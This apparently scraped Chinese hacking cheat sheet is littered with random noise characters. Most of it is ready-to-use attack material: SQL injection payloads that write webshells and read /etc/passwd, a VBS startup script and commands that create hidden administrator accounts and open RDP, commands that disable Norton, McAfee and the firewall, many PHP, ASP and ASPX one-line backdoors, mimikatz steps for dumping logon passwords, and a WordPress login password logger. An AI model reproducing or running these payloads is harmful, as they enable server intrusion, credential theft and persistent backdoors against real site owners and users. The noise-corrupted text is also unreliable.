# P' F1 T& |+ m4 @$ Iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );: v7 |; o: q0 V6 w, E
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " ); ^: Q/ w# C5 ~: y0 x2 J- }/ A0 Y
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
( Z/ `/ p, p; a2 W+ b7 d5 qdrop table a;- X, e2 r7 h$ ~ L6 C$ U) x! G
( d+ n2 v7 a, J
英文版本:9 C( K. N f* O3 s& `& X& e# y
" h1 \# k8 a/ ?3 q
use test;
. g1 r- X2 f( R5 |1 l( E- Zcreate table a (cmd text);* g+ f: }9 ~5 i2 m2 w
insert into a values ("set wshshell=createobject (""wscript.shell"") " );7 T8 F) O# ~" F
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );% B) I: k% g1 T: @4 F- V
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
9 R- B4 m* \9 X8 t' vselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
. d. i8 r9 v- O' S8 C# T% Tdrop table a;: l, s9 i. H; p0 ^
& Y+ Z% P4 g. k$ U s; ^% w7 Kcreate table a (cmd BLOB);
I4 S: Y9 V( Winsert into a values (CONVERT(木马的16进制代码,CHAR));
; P' M* [4 X, b) j( [- l% {select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'% a" c7 S+ V7 o/ Z) ~
drop table a; [5 c' \" q+ x2 H' b. y# x% ^
3 D, i% N/ `9 \' `& T
记录一下怎么处理变态诺顿
5 _. T( n, q2 P4 S" y) w查看诺顿服务的路径9 X1 I4 v: t. ^: P
sc qc ccSetMgr& A2 x7 v, C" D* c
然后设置权限拒绝访问。做绝一点。。
; K; B1 U, f2 b# qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
" v( H8 a: n: Y( R- H- T4 |cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"/ P/ N& L9 f' K" e2 v
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
! ?2 n/ p+ P& J* Z& K; K- \cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone8 n$ _8 \+ d/ v- }, M5 d
) g3 b: D- y2 P. \" `& u
然后再重启服务器
* J5 y! ?) i( R2 |iisreset /reboot
3 |, j/ X' [, m; n) `6 N/ o/ {这样就搞定了。。不过完事后。记得恢复权限。。。。
/ J4 @! u: G9 C! ?) k3 }cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F6 Y: X6 {4 a1 f8 s7 H
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
) J: h+ n, M- G8 j. Ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
$ }. Q" R4 n+ pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F! f2 p* B( y( t( a' n
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin5 J# t1 ?. ^* K- f3 f/ A7 A
$ D- x: G3 Z& Z( d0 Z
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''') r) }4 z9 x% G% i
6 f3 |; _& x: a, g* v% Z0 @! j3 q7 y
postgresql注射的一些东西
. m# r" j; `" v- Q F/ K" r, b: @如何获得webshell# C0 m& C7 G# D+ H* I
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); ) E" Y) C% p- |) S$ J4 H( k/ e% c
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
% J0 q( r( h4 \- D7 A# k. l0 ghttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;9 O( ~) j0 M( [; {. d
如何读文件
3 {; o! t# Y+ s: H4 z3 n: qhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);8 z) ]9 l C/ a1 k
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
* d! J% p8 c/ t5 K: Whttp://127.0.0.1/postgresql.php?id=1;select * from myfile;4 `0 j% E* f2 @4 K$ ~. I2 y5 [! z* b
1 O4 T8 b4 ^" |! o$ D) }- rz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。0 i& u4 T8 h3 b/ L) e
当然,这些的postgresql的数据库版本必须大于8.X
7 T: I+ D1 b4 P创建一个system的函数:
0 k0 B3 a; q2 u+ D5 B. j* ~& uCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT1 T% n- ?7 W5 D. u
7 u9 V1 W' l2 Z- a5 u) a8 B创建一个输出表:3 _% j o; m: a( V* [
CREATE TABLE stdout(id serial, system_out text)% M3 }5 W6 }: ]# k
- J X% z; E1 n执行shell,输出到输出表内:
$ \% J) h% x% Z6 g8 ZSELECT system('uname -a > /tmp/test')
$ d- k7 p4 d1 t/ I2 L6 b$ T \
. w. ?5 R* W- O6 d2 ^: B/ y: ucopy 输出的内容到表里面;
& Z0 V" ?" q4 w4 S( bCOPY stdout(system_out) FROM '/tmp/test'
. X, I. q" t9 y1 k( D. ^1 X# K
' s3 `3 b- H4 `+ J8 H" i从输出表内读取执行后的回显,判断是否执行成功; i) u$ G9 k5 t' x! A& p
6 s. n0 q4 S4 H+ _7 E( OSELECT system_out FROM stdout
8 c- G- L) B6 d3 S2 I下面是测试例子
9 z9 s5 N4 y8 f7 T" Y, s$ Y" w: F: X8 T; ?
# K3 A) ~* ]8 ]6 _# d/ J7 J1 }3 \/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- . `; D4 b1 R2 F
" B2 O9 `0 r1 Y/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
% g! A3 s7 ~+ n7 v8 `# HSTRICT --
6 Z, m6 x7 {8 R) V8 u" W. e4 T0 _7 U
/store.php?id=1; SELECT system('uname -a > /tmp/test') --; z& ?- P. F3 q; b
- }$ I: b6 r/ a5 {4 m1 D4 Y. G
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --6 V- k. j2 D4 q* W; `/ e
I" v/ J0 R0 ^/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
9 H+ C6 c: K& \6 V/ inet stop sharedaccess stop the default firewall
7 i, m9 l/ Z! K8 Knetsh firewall show show/config default firewall& y; K6 z! f% q& Q9 h
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall" l# r3 X& ~ Z, \" R5 Z5 F) F! y3 F
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
8 S. K R* C% t修改3389端口方法(修改后不易被扫出)
7 a j1 _% y8 w, E" {- i9 j) I$ y修改服务器端的端口设置,注册表有2个地方需要修改 |' N0 e8 w5 v0 Y& w
% h: B( M$ u0 y+ W0 V, g2 @
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]9 E7 ~; t0 U7 W' I
PortNumber值,默认是3389,修改成所希望的端口,比如60005 u0 ~* U& C& z. T7 G
2 _% u7 ^# R. Q( \. D" Y6 R9 j
第二个地方:
/ K6 N" |. R. b2 i( L. |" ?[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] & x2 J9 B& V6 a2 F6 F7 ?
PortNumber值,默认是3389,修改成所希望的端口,比如60008 O7 h) V: ?+ |5 ?5 {0 H, Z
: o+ c6 w r1 [6 Q4 W
现在这样就可以了。重启系统就可以了
$ W% M; K' k/ r. E& P7 y9 m. _& Y+ O8 r9 F. [8 y
查看3389远程登录的脚本: R9 `/ m" x7 M2 \. j) S
保存为一个bat文件, M H+ k. H. _, w) K9 ^: S% a, I
date /t >>D:\sec\TSlog\ts.log
/ \! S. c; v, X) {time /t >>D:\sec\TSlog\ts.log8 V" c/ ^! K l2 r. K3 \0 \
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
& l6 O& d$ t- ]! C6 Fstart Explorer! t! E T) s6 g2 R a2 Q
: f3 r; n0 p5 s( @5 Y% n% cmstsc的参数:
$ v; D/ M& Q4 j. v1 G7 }. Z/ w: ]% @% N% w
远程桌面连接
4 I4 J, w- W+ _# a5 ^5 Z7 E. }, [2 e% I5 K2 k
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]7 g1 W/ _0 a1 d1 m1 n1 R/ X
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?* `6 D. l& v) U
: H4 X) ]: _% j% j5 ?& A8 I/ r<Connection File> -- 指定连接的 .rdp 文件的名称。/ s+ E% L1 V/ S: X( ?
4 R N1 k5 h* w6 a* a/v:<server[:port]> -- 指定要连接到的终端服务器。7 e7 `0 Z( ]& j" |7 Y: K
' B$ G1 O, _4 n6 ~6 S j; d/console -- 连接到服务器的控制台会话。
8 a. x$ M7 ]! d* m5 n; \! W. [; `6 B" J# e& i, ?$ c
/f -- 以全屏模式启动客户端。. w- _& o! I3 Q3 Z$ f
) h# U+ e. D. ?& X
/w:<width> -- 指定远程桌面屏幕的宽度。
' e9 U! h$ {% j5 m0 i, ]% P# k
# N$ H' k& p+ v2 o# i- f5 b/h:<height> -- 指定远程桌面屏幕的高度。
$ _: e5 A) }4 s! l2 e2 ]. _3 M% J0 p( q# A$ @2 d
/edit -- 打开指定的 .rdp 文件来编辑。6 `7 u+ p) p% F
+ ~6 X a3 e0 G4 _! ?- q
/migrate -- 将客户端连接管理器创建的旧版6 p$ \9 \5 `. U1 A- {/ w6 W- H; {
连接文件迁移到新的 .rdp 连接文件。) H6 L' d! [; z! n3 j' b5 b
- U* J* i0 e. [' U$ b/ a5 e5 D" j
* O/ p! {7 Q- G6 @! L/ p其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
6 B4 v- ~6 a9 v, D# f4 rmstsc /console /v:124.42.126.xxx 突破终端访问限制数量% q% L) Q7 h, G: B$ b- T m W5 h# \# L
( c. }3 J! I' D$ v* Q6 v
命令行下开启3389/ K5 Y X+ R# v! H/ n# S, H8 ?4 M
net user asp.net aspnet /add# D2 P1 M& ^) Y, y/ }) F
net localgroup Administrators asp.net /add7 F) z/ r4 p T8 r7 r$ e
net localgroup "Remote Desktop Users" asp.net /add& f- w" K! m0 \0 }
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D j( V! |: t. `" Y/ M$ ^
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
. t" P( g6 C8 H6 o8 r1 ~. a2 }echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
! W J% `* x1 L) H C( h# Necho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f0 Y) V: |4 f, u' l* ^
sc config rasman start= auto
+ Z) o, _+ \1 C* h3 K: C Usc config remoteaccess start= auto
" f6 D5 L E, S b4 ^net start rasman
: q9 _. @& M+ M9 K5 R+ X/ Lnet start remoteaccess
) d1 ^- K ]9 z, fMedia
. \" R" ^9 b5 n2 X; ?- [) V<form id="frmUpload" enctype="multipart/form-data"3 k$ d( k+ K3 `/ D
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>( t5 ?& `. l3 A Y3 C1 ~! A
<input type="file" name="NewFile" size="50"><br>
+ w# l6 A6 l0 P C$ w7 T<input id="btnUpload" type="submit" value="Upload">! l) S Q( j& ]1 Y' y' U4 R
</form># H4 G+ w' C0 _4 `! n: i n6 @" m
3 {9 A* e9 _! |* k5 rcontrol userpasswords2 查看用户的密码9 f. G' M. R3 f- z% \ Q
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
& Y0 \- H% ?, D/ l: S2 b3 ?SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a. i# ]& Z8 c# A. c
4 ^& Z: R0 R" k1 z141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
, K X' E1 W F) F" n/ x0 |5 ?/ y测试1:
. ?$ M' m8 e' |9 k/ a% `SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
* _1 Y$ { ?4 Z6 ]0 C% {6 v& \/ Q. w; _0 d0 m3 j
测试2:' Z, k S1 Q& t& c
) ~# \" u1 c* p8 I5 S( J' [ \
create table dirs(paths varchar(100),paths1 varchar(100), id int) e; _* o% b! k. b
$ @6 g/ U* |/ a- n: L- a
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
! c) _* Y# D8 H3 W- d- |: ]: i- M1 N# h0 R5 g- t. b
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
0 w- d9 m0 v ~# n关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
+ n$ } ?( H9 i& [可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;( M( ^: o0 H+ a! ^
net stop mcafeeframework* t+ V$ s& k O J, v( h
net stop mcshield
" Q0 b! v, ]9 c# E! wnet stop mcafeeengineservice
) @( C7 j) m& m9 ?, R/ _# Dnet stop mctaskmanager
9 l% ]! x$ a# h& r( fhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D3 ^; H& Y* V& \/ D" N6 f3 |, [
' M3 U: T! f5 s! z. b3 z
VNCDump.zip (4.76 KB, 下载次数: 1)
/ \, f* t2 e6 `2 Q* i9 u3 j- {4 `密码在线破解http://tools88.com/safe/vnc.php
. K% B3 z3 I- w1 D: q+ O; [VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取 i- ?. h% D. k8 |0 _1 {) ]
/ f5 t. a- U% g F2 P) aexec master..xp_cmdshell 'net user'3 g3 q7 c& q$ l+ _; O/ X
mssql执行命令。
Z! f$ {; Q+ S" b: Z获取mssql的密码hash查询5 U9 F9 |. ~* k- h4 R# @, q1 x* ]
select name,password from master.dbo.sysxlogins5 r+ V% O7 ~( j4 y. C
2 g- [/ E" {7 R5 Ibackup log dbName with NO_LOG;
4 [/ R2 o; `1 |backup log dbName with TRUNCATE_ONLY;3 s$ ?9 `8 ]& D/ _
DBCC SHRINKDATABASE(dbName);0 k6 A& I6 }& |$ W1 @
mssql数据库压缩
' n+ W! L a. K% b: \' R+ _$ B) |, k" t. ~5 Q8 I, o( P6 g* L
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK, q7 @& e5 t0 `7 o; }
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
# [" _" ^9 i% W g* v6 Q* M* c' ~# |- h
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
7 x% N7 O3 c* d备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
; [/ r9 w* F( [; u& V& Q7 I
( E! {+ `$ ~1 M( ?8 {& JDiscuz!nt35渗透要点:
" \& W7 H. d, v' E% X0 w- d(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
+ Z/ G$ k; k8 W0 }5 f$ p(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
9 J) L. }% q) Z8 y+ y' `(3)保存。3 q' \7 _' \6 I6 P8 F+ c
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass6 @2 J# p5 i4 y3 Y
d:\rar.exe a -r d:\1.rar d:\website\& r+ T- c# c+ _
递归压缩website& f$ S. g1 t( M
注意rar.exe的路径& n& A& Q o; [1 j' P
4 ^5 |& D- a$ }' n<?php- w' k! D3 `$ W5 @( T- A! H
8 L) F4 N# v, j8 [: K8 T! J [; i$telok = "0${@eval($_POST[xxoo])}";
* T/ U6 [. I/ q$ q) b. b7 w: {* N
+ F7 a f& W6 n0 f9 _6 W$username = "123456";+ Q0 F, a- o2 Z! R5 x1 T6 W
" s+ Z* p% ?7 t* i7 h4 b
$userpwd = "123456";2 r" A5 k* s' d* u) K1 y4 V& ?! R
$ o8 P- Y! z( l; i( B& J R6 @
$telhao = "123456";7 V! A1 G( u1 j3 g
8 L: @+ ~/ O7 p3 c& K9 W
$telinfo = "123456";
- E' }3 W6 J* y* T' ]' I8 m& f5 i* Y
?> G/ i G1 n" I: e& c
php一句话未过滤插入一句话木马
8 b' _" u' N9 K: G) Q0 ?% c, f) @
6 E6 \, q5 E3 \1 o0 X6 z( M站库分离脱裤技巧9 O8 g5 H$ t9 ~4 n% p
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'% c3 E2 m: f& G9 j- V8 t8 r
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
- F0 D/ v) ~6 y9 d$ Y$ G8 T% t条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
3 c' {7 n( K1 [4 ~- k这儿利用的是马儿的专家模式(自己写代码)。
# D) r5 L- a5 v) i" L+ }. x! }ini_set('display_errors', 1);! d% g0 @2 E" j/ M+ u- y; O
set_time_limit(0);6 m2 Z* S/ q+ P, Z/ Z
error_reporting(E_ALL);
8 L4 ? G4 N e* R) `$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());/ ?+ g7 U) |' K/ P' F N
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());& g m2 Z5 L. \4 i! c/ h
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
3 r- s$ R. e2 e# j! r& E$i = 0;0 s/ }9 P; {6 `$ S) p. V4 J
$tmp = '';
- Q: W& y/ c9 Y- kwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {8 E9 W* M) U4 ~7 \% f
$i = $i+1;
+ ]0 d/ n$ ^/ q: u! ]2 |6 i& V# q& X $tmp .= implode("::", $row)."\n";7 X; p7 A- w8 J4 O* j5 w
if(!($i%500)){//500条写入一个文件% e ~4 Y$ _) j* h5 }$ G
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
$ h3 v Y" _2 F1 v+ B3 z( { file_put_contents($filename,$tmp);4 R% @) b; Q4 B6 w& @& e
$tmp = '';- w8 t2 G% g3 _, W5 X
}
" l9 m2 d% d' U! L}
8 ?. d4 q7 V( x2 |# rmysql_free_result($result);; @" j' X& p: ]- P) U2 x6 j
3 v/ t7 q( e7 j+ ]$ X0 t4 x" ~& q* x; L' V [; W3 S# `3 ~9 ^. u
: E3 X. x! e' J+ v//down完后delete
' P' q+ A3 X; m8 D& E
1 B# M5 Y; b! k7 U# J% K* y d( [# X1 D1 }# A- d% v
ini_set('display_errors', 1);
( D1 |# u2 k; I* ^1 z9 D3 g* y' U1 Ferror_reporting(E_ALL);: u! j9 R2 B1 o4 l8 K2 \( Q
$i = 0;
" M3 t" N; ?# l$ ~/ W) A! ]while($i<32) {
2 v' ?; G; B$ x: @ _, g* t+ I6 D& { $i = $i+1;
% j4 C! t: E+ r $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
$ p: c. i# t/ |; \ unlink($filename);
+ ^5 r T6 E+ Z* H} 4 j& {+ B3 _8 e1 S2 j% ~# E
httprint 收集操作系统指纹$ p' E2 g4 e! X T6 b K( T' Z4 `$ o
扫描192.168.1.100的所有端口
! A5 ?- L- U6 T+ R% Y8 \3 xnmap –PN –sT –sV –p0-65535 192.168.1.100
p3 Z+ D' y1 R! Q1 X; o" Dhost -t ns www.owasp.org 识别的名称服务器,获取dns信息% m: V: U3 r* D( \* N [" _" W- q
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输7 `7 F' q3 y U, ]6 f" _5 n) l6 J
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
. C; u3 l, Y+ `1 Q5 L/ C5 e k+ g
; p. d+ X' w/ [7 K/ iDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
6 f9 }2 C% e9 I+ M
# g4 s; e; R! F* j, P- R5 H9 i MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
' F2 W- ~9 G4 v! x
$ ]+ q% E, g, v6 W. I* D9 ]/ \ Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x* \; v/ n% _% M! @+ H- B
: o4 ~& t6 K! z* D
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
4 K! ]* Y; V7 z2 D+ ^' a$ q: }4 O8 i; a' r/ q! o* r1 o
http://net-square.com/msnpawn/index.shtml (要求安装)5 p8 E/ @/ I! ^$ e. N! ^ j
1 l: R! E$ q* P; \: x2 I7 O7 y
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)% V" X8 \+ \6 k4 [% `
8 R: |. \# u' m1 k' t- \ SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
3 N0 q# O7 [" f3 q: `! m8 R/ |/ `set names gb2312
9 }" B. Y- p7 M+ I2 V' T导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。1 q& x5 }8 I8 \) |% k% z, d
5 y- o' i+ }+ R' ]% r0 R
mysql 密码修改
8 w7 K5 u* m" K2 B4 |* ] `+ uUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 2 A! z- l, U, m& K8 h
update user set password=PASSWORD('antian365.com') where user='root';
7 [" Q1 I5 n3 C" b! dflush privileges;. @' D+ _1 X" O7 j$ ], J5 T
高级的PHP一句话木马后门, Y+ h5 U& {* b3 O8 @% A
0 \1 y7 w2 S$ T9 q% C) d入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀) w7 J" M# h. `* ~# _0 ]+ K4 j o
& {3 m1 }% i- z) q+ n5 M
1、
, [. c8 Q2 }3 S$ { h# x, a; P
. f; z( F5 x% ^7 f' d( H$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";3 L Z- d; k) J) u: {
. Q# V( A6 |2 ?' Y$ k3 ?+ }$ Y
$hh("/[discuz]/e",$_POST['h'],"Access");9 p5 {5 D& ~0 R' c: J
/ y, L8 v2 }4 H& h$ o9 }) C1 L
//菜刀一句话1 N/ r: y0 m$ C; S. o1 s4 |( K
! ^4 j- H2 V! e# K2、# J0 \6 ?9 w0 j5 n
4 S5 w* i0 K" Q [; e; P/ M$filename=$_GET['xbid'];
7 J5 a( ~) A# X q' b+ ?; _% I# J9 q" C8 M W6 f
include ($filename);
8 N/ s$ Z* A( e8 B8 `! n+ e6 F) u' p" k5 G& x
//危险的include函数,直接编译任何文件为php格式运行% R, P4 A7 o0 x
9 M4 B: h4 C, B1 z3、7 o, {* z7 S6 U- |0 v% m6 b
7 p, W% E) [9 `3 w. ~5 l( }/ k! D
$reg="c"."o"."p"."y";
) ~; m9 _+ ?6 A* D* e( _9 w7 o8 Z* C. q' ]2 r7 y
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
+ k; R0 w- |* g# h1 u/ X: V. A5 R9 G/ u7 e K) P
//重命名任何文件% t+ s5 m# V) _: I! g8 y# C
+ H9 P: s* O8 [0 k# ]" K$ a9 a
4、' D/ B' W% R# ] U7 I5 X
' s' G( L k7 `9 N$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";1 Q" y |$ x* k1 {! J; T
( `0 n3 `% s7 `) }' |$gzid("/[discuz]/e",$_POST['h'],"Access");
0 w: p- m. w* J7 Q6 ^# y, K' I/ o* Q
* ^2 U2 f# n4 E//菜刀一句话
. ~: O9 w' ` `7 m) O. N
' {5 U8 q. i5 h2 P4 M2 C5、include ($uid);
# V# {% Q6 V" ?4 t
8 y7 m y9 T6 N. |* O//危险的include函数,直接编译任何文件为php格式运行,POST
! y6 _$ W7 g6 N8 J% e5 f* V5 i
6 p% ~/ P, r5 x' C& \; o: [& P, K
x2 t; J1 d3 j! y( ]//gif插一句话
1 \* i) o9 W* e" C0 A! x+ L) g& {& O7 P% f+ S
6、典型一句话, _/ O1 N+ P1 }& o
! N7 b# [ J; d8 q程序后门代码5 N5 ?! {8 c* B9 h
<?php eval_r($_POST[sb])?>$ r( b% m: H+ [% `5 k! ^% H
程序代码
2 K( `' k, T1 V- d% U<?php @eval_r($_POST[sb])?>' E q4 F, u) u; j% N
//容错代码# q5 U' y4 f9 M3 ~ M
程序代码
( g9 c+ e; J/ C" Y<?php assert($_POST[sb]);?>
! M# |5 y& v! I! _: M//使用lanker一句话客户端的专家模式执行相关的php语句- w& j0 V* m1 I2 Y
程序代码
0 V7 n6 ~' c- C<?$_POST['sa']($_POST['sb']);?>/ @0 X+ k# q2 f; ^8 Y1 c
程序代码
" f$ E) y- L: S% z- B; p7 e4 b<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
R) R6 N3 T: Z4 ]: h7 D程序代码7 f2 d( a, V/ {' W3 Y
<?php( l! _+ L0 |7 n- Z* a% T% ]% h& t
@preg_replace("/[email]/e",$_POST['h'],"error");
$ T( O' g$ `+ q+ h/ z8 d?>
: b" l, ^. f) m, J//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入! n) T9 s z7 `7 b7 `9 I
程序代码2 V! B/ j! e% I- ~+ X' N
<O>h=@eval_r($_POST[c]);</O>" W- W1 u, C& I& }5 b9 n* j0 g
程序代码
4 ~* @) K9 g: z9 O* \7 ^* L3 T<script language="php">@eval_r($_POST[sb])</script>
$ V% Q6 ^: L9 P( Z//绕过<?限制的一句话+ L! T l: {* Q" X, _
/ q: i+ Q$ V; U/ V# khttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
/ z' P ~; Q+ ^' c* k详细用法:1 ]$ ^( _1 F! I% T8 Z+ \ X7 }
1、到tools目录。psexec \\127.0.0.1 cmd
8 K6 }5 L* y$ |- c# f; I' x3 w( y! N2、执行mimikatz( A- j: V" n- @( h4 x4 M8 C7 ?
3、执行 privilege::debug) s& P0 V0 c! V' `8 M" h7 K
4、执行 inject::process lsass.exe sekurlsa.dll
) o' c) \5 J1 N: c* v! J) m5、执行@getLogonPasswords
/ a6 k3 c- `0 N/ W" r; {) R6、widget就是密码
8 J1 h) i7 g! ~* k3 ]2 j7、exit退出,不要直接关闭否则系统会崩溃。
4 D0 p" [7 D5 C3 ^* d
1 L9 \# f* j- j/ h Bhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
* a- q0 r; O9 Y$ e& [+ H6 P/ e0 G0 P y( m" |; s
自动查找系统高危补丁' j/ o( f+ m: D$ U. V, U$ ~0 e- X% D
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt9 b- f: v7 ^* o- d
: u u, _$ B+ {1 q
突破安全狗的一句话aspx后门
3 \, q! f8 Y$ L<%@ Page Language="C#" ValidateRequest="false" %>
" v4 X9 s0 F+ @2 S* z8 U% ]- x<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
8 i2 W5 D) ~) E4 f' e Z2 Jwebshell下记录WordPress登陆密码
* v! t! h G5 \9 Q+ Ewebshell下记录Wordpress登陆密码方便进一步社工
# {. a; |+ g, K在文件wp-login.php中539行处添加:
& `# p9 S( A: ]1 x* \! T// log password
" X' Q/ `2 K( |3 W, A' {$log_user=$_POST['log'];
; e1 l8 J7 l" i3 K$log_pwd=$_POST['pwd'];
w$ H6 _' y! X$log_ip=$_SERVER["REMOTE_ADDR"];7 L5 f# }/ x6 f9 Z ]
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
# K( O% S$ f N& Y6 U6 e$txt=$txt.”\r\n”;
2 V4 p9 u1 Q% }* U+ Vif($log_user&&$log_pwd&&$log_ip){% d8 L7 {- J& I1 y
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);8 m9 M1 n- D" m4 x# Z2 q; \% s
}" V* {2 a6 g( D
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
$ u; n0 r7 H- ` C就是搜索case ‘login’% \6 D2 I: \! n
在它下面直接插入即可,记录的密码生成在pwd.txt中,& W" G0 |) |+ l
